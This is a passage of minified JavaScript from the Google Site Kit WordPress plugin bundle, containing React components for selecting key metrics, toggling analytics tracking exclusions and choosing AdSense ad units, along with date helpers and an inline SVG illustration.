%2$d)</MaxCount>","google-site-kit"),D,s),{MaxCount:(0,p.jsx)("span",{className:"googlesitekit-selection-panel-footer__item-count--max-count"})})});return(0,p.jsx)("footer",{className:"googlesitekit-selection-panel-footer",children:(0,p.jsxs)("div",{className:"googlesitekit-selection-panel-footer__content",children:[E,(0,p.jsxs)("div",{className:"googlesitekit-selection-panel-footer__actions",children:[(0,p.jsx)(M.Button,{onClick:_,disabled:o,tertiary:!0,children:(0,A.__)("Cancel","google-site-kit")}),(0,p.jsx)(M.SpinnerButton,{onClick:b,isSaving:o,disabled:D<a||D>s||o||!l&&m,children:d||N})]})]})})}SelectionPanelFooter.propTypes={savedItemSlugs:n().array,selectedItemSlugs:n().array,saveSettings:n().func,minSelectedItemCount:n().number,maxSelectedItemCount:n().number,isBusy:n().bool,onSaveSuccess:n().func,onCancel:n().func,isOpen:n().bool,closePanel:n().func};const b=SelectionPanel},6109:(e,t,i)=>{"use strict";i.d(t,{tt:()=>j,Jg:()=>k,Gp:()=>T,GH:()=>f,r0:()=>S,Du:()=>v,Zf:()=>H,Cn:()=>z,G7:()=>h,vH:()=>I,N_:()=>w,zh:()=>Y,mK:()=>d.mK,Ql:()=>b,vY:()=>G,sq:()=>x,VZ:()=>O.VZ,JK:()=>d.JK,IS:()=>D,pH:()=>O.pH,kf:()=>B,O5:()=>E,Qr:()=>_,x6:()=>P,K5:()=>d.K5,S_:()=>p,dc:()=>O.dc,Eo:()=>d.Eo,jq:()=>d.jq,DK:()=>W.D,N9:()=>U,p9:()=>o.p,XH:()=>C,Zm:()=>l,sx:()=>s.sx,BI:()=>s.BI,CZ:()=>o.C,BG:()=>V});var a=i(17243),s=i(65054),o=i(50477),n=i(10523),r=i.n(n);function l(e){return r()(JSON.stringify(c(e)))}function c(e){const t={};return Object.keys(e).sort().forEach(i=>{let a=e[i];a&&"object"==typeof a&&!Array.isArray(a)&&(a=c(a)),t[i]=a}),t}var d=i(49746);function g(e){return e.replace(new RegExp("\\[([^\\]]+)\\]\\((https?://[^/]+\\.\\w+/?.*?)\\)","gi"),'<a href="$2" target="_blank" rel="noopener noreferrer">$1</a>')}function u(e){return`<p>${e.replace(/\n{2,}/g,"</p><p>")}</p>`}function m(e){return e.replace(/\n/gi,"<br>")}function p(e){const t=[g,u,m];let i=e;for(const e of t)i=e(i);return i}function I(e){return e=parseFloat(e),isNaN(e)||0===e?[0,0,0,0]:[Math.floor(e/60/60),Math.floor(e/60%60),Math.floor(e%60),Math.floor(1e3*e)-1e3*Math.floor(e)]}function h(e){const t=e&&!Number.isInteger(e)?new Date(e).getTime():e;return isNaN(t)||!t?0:t}var y=i(32091),A=i.n(y),M=i(82871);const N="Date param must construct to a valid date instance or be a valid date instance itself.",f="Invalid dateString parameter, it must be a string.",T='Invalid date range, it must be a string with the format "last-x-days".',S=60,k=60*S,j=24*k,v=7*j;function b(){function e(e){return(0,M.sprintf)(/* translators: %s: number of days */ /* translators: %s: number of days */ (0,M._n)("Last %s day","Last %s days",e,"google-site-kit"),e)}return{"last-7-days":{slug:"last-7-days",label:e(7),days:7},"last-14-days":{slug:"last-14-days",label:e(14),days:14},"last-28-days":{slug:"last-28-days",label:e(28),days:28},"last-90-days":{slug:"last-90-days",label:e(90),days:90}}}function _(e=""){if(!(0,a.isString)(e))return!1;if(3!==e.split("-").length)return!1;const t=new Date(e);return(0,a.isDate)(t)&&!isNaN(t)}function x(e){A()((0,a.isDate)(e)&&!isNaN(e),N);const t=`${e.getMonth()+1}`,i=`${e.getDate()}`;return[e.getFullYear(),t.length<2?`0${t}`:t,i.length<2?`0${i}`:i].join("-")}function C(e){A()(_(e),f);const[t,i,a]=e.split("-");return new Date(t,i-1,a)}function D(e,t){return x(w(e,t*j))}function E(e){const t=e.split("-");return 3===t.length&&"last"===t[0]&&!Number.isNaN(t[1])&&!Number.isNaN(parseFloat(t[1]))&&"days"===t[2]}function w(e,t){A()(_(e)||(0,a.isDate)(e)&&!isNaN(e),f);const i=_(e)?Date.parse(e):e.getTime();return new Date(i-1e3*t)}var Z=i(78159),R=i(38017),L=i(62540);function G(e,t={}){if(Number.isNaN(Number(e)))return"";const{invertColor:i=!1}=t;return(0,Z.Ay)((0,L.jsx)(R.A,{direction:e>0?"up":"down",invertColor:i}))}function z(e,t){return e>0&&t>0?e/t-1:e>0?1:t>0?-1:0}var O=i(48276);function P(e){const t=parseFloat(e)||0;return!!Number.isInteger(t)&&t>0}function B(e){if("number"==typeof e)return!0;const t=(e||"").toString();return!!t&&!isNaN(t)}function U(e){return Array.isArray(e)?[...e].sort():e}var W=i(11193);function H(e,t){function i(e){return"0"===e||0===e}if(i(e)&&i(t))return 0;if(i(e)||Number.isNaN(e))return null;const a=(t-e)/e;return Number.isNaN(a)||!Number.isFinite(a)?null:a}function V(e){try{return JSON.parse(e)&&!!e}catch(e){return!1}}function Y(e){if(!e)return"";const t=e.replace(/&#(\d+);/g,(e,t)=>String.fromCharCode(t)).replace(/(\\)/g,"");return(0,a.unescape)(t)}},6730:(e,t,i)=>{"use strict";i.d(t,{A:()=>GenericErrorHandlerActions});var a=i(62688),s=i.n(a),o=i(82871),n=i(38432),r=i(38021),l=i.n(r),c=i(63696),d=i(12417),g=i(1027),u=i(65123),m=i(49383),p=i(62540);function ReportErrorButton({message:e,componentStack:t}){const[i,a]=(0,c.useState)(!1);return(0,p.jsx)(m.Button,{"aria-label":i?(0,o.__)("Error message copied to clipboard. Click to copy the error message again.","google-site-kit"):void 0,onClick:function(){l()(`\`\`\`\n${e}\n${t}\n\`\`\``),a(!0)},trailingIcon:(0,p.jsx)(d.A,{className:"mdc-button__icon",icon:i?g.A:u.A}),children:i?(0,o.__)("Copied to clipboard","google-site-kit"):(0,o.__)("Copy error contents","google-site-kit")})}ReportErrorButton.propTypes={message:s().string,componentStack:s().string};const I=ReportErrorButton;function GenericErrorHandlerActions({message:e,componentStack:t}){return(0,p.jsxs)("div",{className:"googlesitekit-generic-error-handler-actions",children:[(0,p.jsx)(I,{message:e,componentStack:t}),(0,p.jsx)(n.A,{href:"https://wordpress.org/support/plugin/google-site-kit/",external:!0,children:(0,o.__)("Report this problem","google-site-kit")})]})}GenericErrorHandlerActions.propTypes={message:s().string,componentStack:s().string}},7076:(e,t,i)=>{"use strict";i.d(t,{d:()=>n});var a=i(18117),s=i(17243),o=i(63696);function n(...e){const t=(0,a.MA)(()=>(0,s.debounce)(...e),e);return(0,o.useEffect)(()=>()=>t.cancel(),[t]),t}},7144:(e,t,i)=>{"use strict";i.d(t,{EA:()=>o,GF:()=>y,Hl:()=>g,IX:()=>p,Is:()=>n,KD:()=>m,LO:()=>d,NO:()=>c,Nl:()=>l,QJ:()=>u,Uf:()=>s,XU:()=>h,Y0:()=>r,hs:()=>A,wb:()=>I});var a=i(82871);const s="key-metrics-setup-cta-widget",o="googlesitekit-key-metrics-selection-panel-opened",n="key-metrics-selection-form",r="key-metrics-selected",l="key-metrics-effective-selection",c="key-metrics-unstaged-selection",d=2,g=8,u={SLUG:"current-selection",LABEL:(0,a.__)("Current selection","google-site-kit")},m={SLUG:"suggested",LABEL:(0,a.__)("Suggested","google-site-kit")},p={SLUG:"visitors",LABEL:(0,a.__)("Visitors","google-site-kit")},I={SLUG:"driving-traffic",LABEL:(0,a.__)("Driving traffic","google-site-kit")},h={SLUG:"generating-leads",LABEL:(0,a.__)("Generating leads","google-site-kit")},y={SLUG:"selling-products",LABEL:(0,a.__)("Selling products","google-site-kit")},A={SLUG:"content-performance",LABEL:(0,a.__)("Content performance","google-site-kit")}},7551:(e,t,i)=>{"use strict";i.d(t,{Ay:()=>r,Oo:()=>o,oE:()=>n});var a=i(20697),s=i(62659);const o=a.jU,n=a.f7;function r(){const e=(0,s.A)();return e===a.jU||e===a.Ax?o:e===a.f7||e===a.Is?n:null}},7972:(e,t,i)=>{"use strict";i.d(t,{F:()=>s,n:()=>a});const a="core/ui",s="activeContextID"},8084:(e,t,i)=>{"use strict";i.d(t,{$C:()=>b,RF:()=>v,WI:()=>k,_5:()=>f,jU:()=>N,o3:()=>M,x0:()=>S});var a=i(32091),s=i.n(a),o=i(50532),n=i.n(o),r=i(17243),l=i(78913);const c="GET_REGISTRY",d="AWAIT";function g(...e){const t=e.reduce((e,t)=>({...e,...t}),{}),i=T(e.reduce((e,t)=>[...e,...Object.keys(t)],[]));return s()(0===i.length,`collect() cannot accept collections with duplicate keys. Your call to collect() contains the following duplicated functions: ${i.join(", ")}. Check your data stores for duplicates.`),t}const u=g,m=g;function p(...e){const t=[...e];let i;return"function"!=typeof t[0]&&(i=t.shift()),(e=i,a={})=>t.reduce((e,t)=>t(e,a),e)}const I=g,h=g,y=g;function A(e){return e}function M(...e){const t=y(...e.map(e=>e.initialState||{}));return{initialState:t,controls:m(...e.map(e=>e.controls||{})),actions:u(...e.map(e=>e.actions||{})),reducer:p(t,...e.map(e=>e.reducer||A)),resolvers:I(...e.map(e=>e.resolvers||{})),selectors:h(...e.map(e=>e.selectors||{}))}}const N={getRegistry:()=>({payload:{},type:c}),*await(e){return{payload:{value:e},type:d}}},f={[c]:(0,l.b)(e=>()=>e),[d]:({payload:e})=>e.value};function T(e){const t=[],i={};for(let a=0;a<e.length;a++){const s=e[a];i[s]=i[s]>=1?i[s]+1:1,i[s]>1&&t.push(s)}return t}const S={actions:N,controls:f,reducer:A};function k(e){return t=>j(e(t))}const j=n()(e=>(0,r.mapValues)(e,(e,t)=>(...i)=>{const a=e(...i);return s()(void 0!==a,`${t}(...) is not resolved`),a}));function v(e,{negate:t=!1}={}){return{safeSelector:(0,l.N)(i=>(a,...s)=>{const o=!t,n=!!t;try{return e(i,a,...s),o}catch{return n}}),dangerousSelector:(0,l.N)(t=>(i,...a)=>{e(t,i,...a)})}}function b(e,t){return s()("function"==typeof e,"a validator function is required."),s()("function"==typeof t,"an action creator function is required."),s()("Generator"!==e[Symbol.toStringTag]&&"GeneratorFunction"!==e[Symbol.toStringTag],"an action’s validator function must not be a generator."),(...i)=>(e(...i),t(...i))}},8513:(e,t,i)=>{"use strict";i.d(t,{Kk:()=>o,SZ:()=>a,Yw:()=>n,oJ:()=>r,tT:()=>s});const a="body",s=[a,"display","headline","label","title"],o="small",n="medium",r=[o,n,"large"]},8732:(e,t,i)=>{"use strict";i.d(t,{$:()=>o,D:()=>s});var a=i(20697);const s="core/notifications",o=[a.uR,a.jU,a.f7,a.Ax,a.Is]},9279:(e,t,i)=>{"use strict";i.d(t,{Ay:()=>TrackingExclusionSwitches,BN:()=>m});var a=i(63696),s=i(82871),o=i(50539),n=i(49383),r=i(80),l=i(33052),c=i(83880),d=i(62540);const g="loggedinUsers",u="contentCreators",m={[g]:(0,s.__)("All logged-in users","google-site-kit"),[u]:(0,s.__)("Users that can write posts","google-site-kit")};function TrackingExclusionSwitches(){const e=(0,o.useSelect)(e=>e(r.K9).getTrackingDisabled()),{setTrackingDisabled:t}=(0,o.useDispatch)(r.K9);let i;i=e&&e.includes(g)?(0,s.__)("All logged-in users will be excluded from Analytics tracking","google-site-kit"):e&&e.includes(u)?(0,s.__)("Users that can write posts will be excluded from Analytics tracking","google-site-kit"):(0,s.__)("All logged-in users will be included in Analytics tracking","google-site-kit");const p=(0,a.useCallback)((i,a)=>{const s=a?e.concat(i):e.filter(e=>e!==i);t(s)},[e,t]),I=(0,a.useCallback)(e=>{const{checked:t}=e.target;p(u,t)},[p]),h=(0,a.useCallback)(e=>{const{checked:t}=e.target;p(g,t)},[p]);return Array.isArray(e)?(0,d.jsxs)("div",{className:"googlesitekit-settings-module__fields-group",children:[(0,d.jsx)(l.A,{as:"h4",size:"small",type:"title",className:"googlesitekit-settings-module__fields-group-title",children:(0,s.__)("Exclude Analytics","google-site-kit")}),(0,d.jsxs)("div",{className:"googlesitekit-settings-module__meta-item",children:[(0,d.jsxs)("div",{className:"googlesitekit-settings-module__inline-items",children:[(0,d.jsx)("div",{className:"googlesitekit-settings-module__inline-item",children:(0,d.jsx)(n.Switch,{label:m[g],checked:e.includes(g),onClick:h,hideLabel:!1})}),!e.includes(g)&&(0,d.jsx)("div",{className:"googlesitekit-settings-module__inline-item",children:(0,d.jsx)(n.Switch,{label:m[u],checked:e.includes(u),onClick:I,hideLabel:!1})})]}),(0,d.jsx)(c.A,{children:i})]})]}):null}},9577:(e,t,i)=>{"use strict";function a(e){return"string"==typeof e&&/^pub-\d+$/.test(e)}function s(e){return"string"==typeof e&&/^ca-pub-\d+$/.test(e)}i.d(t,{H:()=>a,X:()=>s})},9616:(e,t,i)=>{"use strict";i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});const __WEBPACK_DEFAULT_EXPORT__=function(e){if("string"==typeof e&&e.match(/[0-9]{8}/)){const t=e.slice(0,4),i=Number(e.slice(4,6))-1,a=e.slice(6,8);return new Date(t,i.toString(),a)}return!1}},10626:(e,t,i)=>{"use strict";i.d(t,{A:()=>WebStoriesAdUnitSelect});var a=i(63696),s=i(82871),o=i(49383),n=i(50539),r=i(35952),l=i(62540);function WebStoriesAdUnitSelect(){const e=(0,n.useSelect)(e=>e(r.wl).getAccountID()),t=(0,n.useSelect)(e=>e(r.wl).getClientID()),i=(0,n.useSelect)(e=>e(r.wl).getWebStoriesAdUnit()),c=(0,n.useSelect)(i=>i(r.wl).getAdUnits(e,t)),d=(0,n.useSelect)(i=>i(r.wl).hasFinishedResolution("getAdUnits",[e,t])),{setWebStoriesAdUnit:g}=(0,n.useDispatch)(r.wl),u=(0,a.useCallback)((e,t)=>{const a=t.dataset.value;i!==a&&g(a)},[i,g]);return d?(0,l.jsxs)(o.Select,{className:"googlesitekit-adsense__select-field",label:(0,s.__)("Web Stories Ad Unit","google-site-kit"),value:i,onEnhancedChange:u,enhanced:!0,outlined:!0,children:[(0,l.jsx)(o.Option,{value:"",children:(0,s.__)("Select ad unit","google-site-kit")}),(c||[]).map(({_id:e,displayName:t})=>(0,l.jsx)(o.Option,{value:e,children:t},e))]}):(0,l.jsx)(o.ProgressBar,{small:!0})}},10740:(e,t,i)=>{"use strict";i.d(t,{$z:()=>s.$,CR:()=>r.C,Cf:()=>l.DialogContent,Es:()=>l.DialogFooter,Nv:()=>a.N,P3:()=>n.P,Si:()=>o.S,fI:()=>d.fI,fh:()=>d.fh,lG:()=>c.a,xA:()=>d.xA});var a=i(91046),s=i(3412),o=i(30454),n=i(26569),r=i(56655),l=i(12786),c=i.n(l),d=i(84984)},11193:(e,t,i)=>{"use strict";i.d(t,{D:()=>o});var a=i(32091),s=i.n(a);function o(e,{dateRangeLength:t}){s()(Array.isArray(e),"report must be an array to partition."),s()(Number.isInteger(t)&&t>0,"dateRangeLength must be a positive integer.");const i=-1*t;return{currentRange:e.slice(i),compareRange:e.slice(2*i,i)}}},11883:(e,t,i)=>{"use strict";i.d(t,{YJ:()=>o,Eq:()=>n});var a=i(97513),s=i(17243);function o(e,t){const a=document.querySelector(e);if(!a)return 0;const s=a.getBoundingClientRect().top,o=n(t);return s+i.g.scrollY-o}function n(e){let t=function(e){let t=0;const o=document.querySelector(".googlesitekit-header");t=o&&"sticky"===i.g.getComputedStyle(o).position?function(e){const t=document.querySelector(".googlesitekit-header");if(t){if(e===a.mp)return t.offsetHeight;const i=t.getBoundingClientRect().bottom;return i<0?0:i}return 0}(e):function(e){const t=document.querySelector("#wpadminbar");if(t&&e!==a.mp)return t.offsetHeight;return 0}(e);return t=function(e){return(0,s.isFinite)(e)?e:0}(t),t<0?0:t}(e);const o=document.querySelectorAll(".googlesitekit-navigation, .googlesitekit-entity-header");return t+=Array.from(o).reduce((e,t)=>e+t.offsetHeight,0),t}},11999:(e,t,i)=>{"use strict";i.d(t,{s:()=>a});const a="core/forms"},12317:(e,t,i)=>{"use strict";i.d(t,{A:()=>g});var a=i(62688),s=i.n(a),o=i(4452),n=i.n(o),r=i(49383),l=i(38432),c=i(33052),d=i(62540);function CTA({title:e,headerText:t,headerContent:i,description:a,ctaLink:s,ctaLabel:o,ctaLinkExternal:g,ctaType:u,error:m,onClick:p,"aria-label":I,children:h}){return(0,d.jsxs)("div",{className:n()("googlesitekit-cta",{"googlesitekit-cta--error":m}),children:[(t||i)&&(0,d.jsxs)("div",{className:"googlesitekit-cta__header",children:[t&&(0,d.jsx)(c.A,{as:"h2",size:"small",type:"label",className:"googlesitekit-cta__header_text",children:t}),i]}),(0,d.jsxs)("div",{className:"googlesitekit-cta__body",children:[e&&(0,d.jsx)(c.A,{as:"h3",size:"small",type:"title",className:"googlesitekit-cta__title",children:e}),a&&"string"==typeof a&&(0,d.jsx)("p",{className:"googlesitekit-cta__description",children:a}),a&&"string"!=typeof a&&(0,d.jsx)("div",{className:"googlesitekit-cta__description",children:a}),o&&"button"===u&&(0,d.jsx)(r.Button,{"aria-label":I,href:s,onClick:p,children:o}),o&&"link"===u&&(0,d.jsx)(l.A,{href:s,onClick:p,"aria-label":I,external:g,hideExternalIndicator:g,arrow:!0,children:o}),h]})]})}CTA.propTypes={title:s().string.isRequired,headerText:s().string,description:s().oneOfType([s().string,s().node]),ctaLink:s().string,ctaLinkExternal:s().bool,ctaLabel:s().string,ctaType:s().string,"aria-label":s().string,error:s().bool,onClick:s().func,children:s().node,headerContent:s().node},CTA.defaultProps={title:"",headerText:"",headerContent:"",description:"",ctaLink:"",ctaLabel:"",ctaType:"link",error:!1,onClick:()=>{}};const g=CTA},12666:(e,t,i)=>{"use strict";i.d(t,{A:()=>ChipTabGroup});var a=i(63696),s=i(81276),o=i(50539),n=i(7144),r=i(11999),l=i(80),c=i(22942),d=i(7972),g=i(97345),u=i(88273),m=i(97513),p=i(68832);var I=i(31589),h=i(7076);var y=i(62688),A=i.n(y),M=i(49383),N=i(4452),f=i.n(N),T=i(80452),S=i(42343),k=i(64515),j=i(62540);const v={[n.QJ.SLUG]:T.A,[n.KD.SLUG]:S.A};function Chip({slug:e,label:t,isActive:i,onClick:a,hasNewBadge:s=!1,selectedCount:o=0}){const n=v[e]||k.A;return(0,j.jsxs)(M.Button,{className:f()("googlesitekit-chip-tab-group__chip-item",{"googlesitekit-chip-tab-group__chip-item--active":i}),icon:(0,j.jsx)(n,{width:12,height:12,className:`googlesitekit-chip-tab-group__chip-item-svg googlesitekit-chip-tab-group__chip-item-svg__${e}`}),trailingIcon:o>0?(0,j.jsxs)("span",{className:"googlesitekit-chip-tab-group__chip-item-count",children:["(",o,")"]}):null,onClick:()=>a(e),children:[t,s&&(0,j.jsx)("span",{className:"googlesitekit-chip-tab-group__chip-item-new-dot"})]})}Chip.propTypes={slug:A().string.isRequired,label:A().string.isRequired,isActive:A().bool,hasNewBadge:A().bool,selectedCount:A().number,onClick:A().func.isRequired};const b={[n.QJ.SLUG]:T.A,[n.KD.SLUG]:S.A};function TabItems({containerRef:e,isMobileBreakpoint:t,chipItemRows:i,allGroups:a,isActive:s,onChipChange:o,selectedCounts:n,newlyDetectedMetrics:r,activeGroupIndex:l}){return(0,j.jsxs)("div",{className:"googlesitekit-chip-tab-group__tab-items",ref:e,children:[!t&&i.map(e=>(0,j.jsx)("div",{className:"googlesitekit-chip-tab-group__tab-items-row",children:e.map(e=>(0,j.jsx)(Chip,{slug:e.SLUG,label:e.LABEL,hasNewBadge:!!r?.[e.SLUG],isActive:e.SLUG===s,onClick:o,selectedCount:n[e.SLUG]},e.SLUG))},`row-${e[0].SLUG}`)),t&&(0,j.jsx)(M.TabBar,{activeIndex:l,handleActiveIndexUpdate:e=>o(null,e),children:a.map((e,t)=>{const i=b[e.SLUG]||k.A;return(0,j.jsxs)(M.Tab,{"aria-label":e.LABEL,children:[(0,j.jsx)(i,{width:12,height:12,className:`googlesitekit-chip-tab-group__chip-item-svg googlesitekit-chip-tab-group__tab-item-mobile-svg googlesitekit-chip-tab-group__chip-item-svg__${e.SLUG}`}),e.LABEL,n[e.SLUG]>0&&(0,j.jsxs)("span",{className:"googlesitekit-chip-tab-group__chip-item-count",children:["(",n[e.SLUG],")"]}),!!r?.[e.SLUG]&&(0,j.jsx)("span",{className:"googlesitekit-chip-tab-group__chip-item-new-dot"})]},t)})})]})}TabItems.propTypes={containerRef:A().object,isMobileBreakpoint:A().bool,chipItemRows:A().array.isRequired,allGroups:A().array.isRequired,isActive:A().string.isRequired,onChipChange:A().func.isRequired,selectedCounts:A().object.isRequired,newlyDetectedMetrics:A().object.isRequired,activeGroupIndex:A().number.isRequired};var _,x,C,D,E,w,Z,R,L,G,z,O,P,B,U,W,H,V,Y,F,Q,J,X=i(82871),q=i(4169),K=i(5856);function MetricItem({slug:e,title:t,description:i,isNewlyDetected:s,savedItemSlugs:l=[]}){const c=(0,o.useSelect)(t=>{const{getModule:i}=t(u.i),a=t(q.aO).getWidget(e);return a?.modules.reduce((e,t)=>{const a=i(t);return a?.connected||!a?.name?e:[...e,a.name]},[])}),d=(0,p.A)(n.Is,n.Y0),{getValue:g}=(0,o.useSelect)(e=>e(r.s)),{setValues:m}=(0,o.useDispatch)(r.s),I=(0,a.useCallback)(t=>{const i=g(n.Is,n.Y0),a=t.target.checked?i.concat([e]):i.filter(t=>t!==e);m(n.Is,{[n.Y0]:a,[n.NO]:a})},[g,m,e]),h=d?.includes(e),y=!l.includes(e)&&c.length>0,A=`key-metric-selection-checkbox-${e}`;return(0,j.jsx)(K.y3,{id:A,slug:e,title:t,description:i,isNewlyDetected:s,isItemSelected:h,isItemDisabled:y,onCheckboxChange:I,children:c.length>0&&(0,j.jsx)("div",{className:"googlesitekit-selection-panel-item-error",children:(0,X.sprintf)(/* translators: %s: module names. */ /* translators: %s: module names. */ (0,X._n)("%s is disconnected, no data to show","%s are disconnected, no data to show",c.length,"google-site-kit"),c.join((0,X.__)(" and ","google-site-kit")))})})}function $(){return $=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},$.apply(null,arguments)}MetricItem.propTypes={slug:A().string.isRequired,title:A().string.isRequired,description:A().string.isRequired,isNewlyDetected:A().bool,savedItemSlugs:A().array};const key_metrics_no_selected_items=e=>a.createElement("svg",$({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 383 238"},e),_||(_=a.createElement("path",{fill:"#B8E6CA",d:"M59.238 58.571c-2.136 20.178 4.272 29.099 20.48 53.216 16.209 24.118-29.092 62.914 5.475 101.268 33.827 37.532 69.419.009 111.314-4.555 29.443-3.208 57.819 12.98 90.86 5.9s46.385-42.599 43.153-68.059c-5.59-44.041-26.24-49.107-34.893-66.461s2.902-52.997-30.287-73.16-76.71 14.42-112.503 12.37c-20.651-1.182-40.932-4.995-59.264.86-18.53 5.918-32.662 22.571-34.335 38.621"})),x||(x=a.createElement("g",{filter:"url(#key-metrics-no-selected-items_svg__a)"},a.createElement("rect",{width:130.621,height:89.651,x:242.455,y:45.266,fill:"#fff",rx:10.957,transform:"rotate(15 242.455 45.266)"}))),C||(C=a.createElement("rect",{width:24.903,height:7.969,x:253.726,y:64.785,fill:"#EBEEF0",rx:3.985,transform:"rotate(15 253.726 64.785)"})),D||(D=a.createElement("rect",{width:49.806,height:19.923,x:249.342,y:81.144,fill:"#FFDED3",rx:9.961,transform:"rotate(15 249.342 81.144)"})),E||(E=a.createElement("rect",{width:99.428,height:8.773,x:240.436,y:114.357,fill:"#EBEEF0",rx:3.985,transform:"rotate(15 240.436 114.357)"})),w||(w=a.createElement("path",{stroke:"#fff",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:1.494,d:"m256.195 90.198 4.644 8.044m0 0 1.412-4.986m-1.412 4.986-5.023-1.27"})),Z||(Z=a.createElement("rect",{width:19.923,height:5.977,x:268.706,y:93.551,fill:"#fff",rx:1.992,transform:"rotate(15 268.706 93.55)"})),R||(R=a.createElement("g",{filter:"url(#key-metrics-no-selected-items_svg__b)"},a.createElement("rect",{width:130.621,height:89.68,x:13.887,y:79.094,fill:"#fff",rx:10.957,transform:"rotate(-15 13.887 79.094)"}))),L||(L=a.createElement("rect",{width:62.386,height:7.798,x:32.989,y:90.122,fill:"#EBEEF0",rx:3.899,transform:"rotate(-15 32.99 90.122)"})),G||(G=a.createElement("rect",{width:49.806,height:19.923,x:37.691,y:106.902,fill:"#FFDED3",rx:9.961,transform:"rotate(-15 37.691 106.902)"})),z||(z=a.createElement("rect",{width:99.428,height:7.798,x:46.612,y:140.967,fill:"#EBEEF0",rx:3.899,transform:"rotate(-15 46.612 140.967)"})),O||(O=a.createElement("path",{stroke:"#fff",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:1.494,d:"m48.152 111.318 8.044 4.645m0 0-1.27-5.024m1.27 5.024-4.986 1.411"})),P||(P=a.createElement("rect",{width:19.923,height:5.977,x:60.663,y:107.966,fill:"#fff",rx:1.992,transform:"rotate(-15 60.663 107.966)"})),B||(B=a.createElement("g",{filter:"url(#key-metrics-no-selected-items_svg__c)"},a.createElement("rect",{width:130.621,height:89.68,x:126.251,y:37.4,fill:"#fff",rx:10.957}))),U||(U=a.createElement("rect",{width:98.333,height:7.867,x:143.013,y:53.134,fill:"#EBEEF0",rx:3.933})),W||(W=a.createElement("rect",{width:49.806,height:19.923,x:142.369,y:70.423,fill:"#B8E6CA",rx:9.961})),H||(H=a.createElement("rect",{width:33.04,height:7.867,x:143.013,y:105.84,fill:"#EBEEF0",rx:3.933})),V||(V=a.createElement("path",{stroke:"#fff",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:1.494,d:"m151.336 84.036 6.568-6.567m0 0-5.182-.073m5.182.073.073 5.18"})),Y||(Y=a.createElement("rect",{width:19.923,height:5.977,x:164.287,y:77.395,fill:"#fff",rx:1.992})),a.createElement("mask",{id:"key-metrics-no-selected-items_svg__d",width:273,height:230,x:58,y:0,maskUnits:"userSpaceOnUse",style:{maskType:"alpha"}},F||(F=a.createElement("path",{fill:"#B8E6CA",d:"M59.237 58.571C57.1 78.75 63.509 87.67 79.717 111.787c16.209 24.118-29.091 62.914 5.475 101.268 33.827 37.532 69.419.009 111.314-4.555 29.444-3.208 57.82 12.98 90.86 5.9s46.385-42.599 43.153-68.059c-5.59-44.041-26.24-49.107-34.893-66.461s2.902-52.997-30.287-73.16-76.71 14.42-112.503 12.37c-20.651-1.182-40.932-4.995-59.264.86C75.042 25.868 60.91 42.52 59.237 58.57"}))),Q||(Q=a.createElement("g",{mask:"url(#key-metrics-no-selected-items_svg__d)"},a.createElement("path",{stroke:"#CBD0D3",strokeMiterlimit:10,strokeWidth:3.147,d:"m227.674 108.973 11.312-8.418M218.925 98.852l2.868-12.68M205.623 102.87l-5.375-13.037"}),a.createElement("path",{stroke:"#3C7251",strokeLinejoin:"round",strokeWidth:9.44,d:"M63.953 190.487c16.127 12.193 38.716 10.349 55.335 5.162 16.618-5.187 31.107-14.61 45.314-23.791 6.717-4.337 13.617-8.738 21.496-11.119s17.057-2.39 22.958 1.658c3.392 2.328 5.205 5.923 5.36 9.702"}),a.createElement("path",{stroke:"#CBD0D3",strokeLinecap:"round",strokeMiterlimit:10,strokeWidth:9.44,d:"m215.831 109.67-19.169 71.73"}),a.createElement("path",{stroke:"#161B18",strokeMiterlimit:10,strokeWidth:9.44,d:"m213.975 116.472-19.169 71.731"}))),J||(J=a.createElement("defs",null,a.createElement("filter",{id:"key-metrics-no-selected-items_svg__a",width:176.33,height:147.36,x:205.773,y:35.772,colorInterpolationFilters:"sRGB",filterUnits:"userSpaceOnUse"},a.createElement("feFlood",{floodOpacity:0,result:"BackgroundImageFix"}),a.createElement("feColorMatrix",{in:"SourceAlpha",result:"hardAlpha",values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"}),a.createElement("feOffset",{dy:3.985}),a.createElement("feGaussianBlur",{stdDeviation:7.969}),a.createElement("feComposite",{in2:"hardAlpha",operator:"out"}),a.createElement("feColorMatrix",{values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"}),a.createElement("feBlend",{in2:"BackgroundImageFix",result:"effect1_dropShadow_2200_11981"}),a.createElement("feBlend",{in:"SourceGraphic",in2:"effect1_dropShadow_2200_11981",result:"shape"})),a.createElement("filter",{id:"key-metrics-no-selected-items_svg__b",width:176.337,height:147.388,x:.409,y:35.793,colorInterpolationFilters:"sRGB",filterUnits:"userSpaceOnUse"},a.createElement("feFlood",{floodOpacity:0,result:"BackgroundImageFix"}),a.createElement("feColorMatrix",{in:"SourceAlpha",result:"hardAlpha",values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"}),a.createElement("feOffset",{dy:3.985}),a.createElement("feGaussianBlur",{stdDeviation:7.969}),a.createElement("feComposite",{in2:"hardAlpha",operator:"out"}),a.createElement("feColorMatrix",{values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"}),a.createElement("feBlend",{in2:"BackgroundImageFix",result:"effect1_dropShadow_2200_11981"}),a.createElement("feBlend",{in:"SourceGraphic",in2:"effect1_dropShadow_2200_11981",result:"shape"})),a.createElement("filter",{id:"key-metrics-no-selected-items_svg__c",width:162.497,height:121.556,x:110.313,y:25.447,colorInterpolationFilters:"sRGB",filterUnits:"userSpaceOnUse"},a.createElement("feFlood",{floodOpacity:0,result:"BackgroundImageFix"}),a.createElement("feColorMatrix",{in:"SourceAlpha",result:"hardAlpha",values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"}),a.createElement("feOffset",{dy:3.985}),a.createElement("feGaussianBlur",{stdDeviation:7.969}),a.createElement("feComposite",{in2:"hardAlpha",operator:"out"}),a.createElement("feColorMatrix",{values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 